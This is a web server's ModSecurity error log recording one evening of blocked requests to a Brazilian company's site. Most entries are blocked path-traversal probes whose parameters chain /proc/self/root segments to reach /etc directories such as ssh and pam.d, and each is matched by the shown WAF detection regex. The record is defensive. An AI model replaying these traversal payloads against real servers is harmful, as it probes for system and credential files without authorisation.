[Mon Mar 16 19:30:56.146060 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:41956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiEoLABkC4fWIHEf8EfLQAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:31:52.235316 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:57394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiE2LysWC90G-1nBrBrmwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:31:54.684885 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:38912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiE2tSswJuvopo3lOiHbAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:32:15.353681 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.228.16:56236] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiE70r9dMAiw-8KANNu8wAAAQY"]
[Mon Mar 16 19:32:44.375064 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:42520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFDNSswJuvopo3lOiHqwAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:25.998888 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:38926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFNaTCbgAP5jq5TehQ8gAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:29.436468 2026] [:error] [pid 29802:tid 140411590858496] [client 74.7.241.46:49858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFOc_BxrYCr4hPDw8R4AAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:32.837677 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:39348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFPKQpVkWug9HeOt9ZOQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:34.095756 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.241.46:39350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFPqTCbgAP5jq5TehQ9gAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:35.307954 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:39362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFP46lpbStxTqkSkuOMgAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:36.417335 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:39368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFQI6lpbStxTqkSkuONAAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:37.705922 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:39380] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFQY6lpbStxTqkSkuONQAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:38.922587 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:41120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFQo6lpbStxTqkSkuOOAAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:40.225336 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:41126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFRLABkC4fWIHEf8Ef9AAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:41.527620 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:41140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFRbysWC90G-1nBrBrsAAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:42.728621 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.241.46:41150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFRkr9dMAiw-8KANNvGQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:44.026970 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:41152] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFSKTCbgAP5jq5TehQ-wAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:45.214576 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:41156] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFSdSswJuvopo3lOiHtgAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:46.552315 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.241.46:41162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFSqTCbgAP5jq5TehQ_gAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:47.744543 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:41176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFS9SswJuvopo3lOiHtwAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:48.904693 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:46284] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFTLysWC90G-1nBrBrswAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:33:50.228420 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:46288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiFTo6lpbStxTqkSkuOOwAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
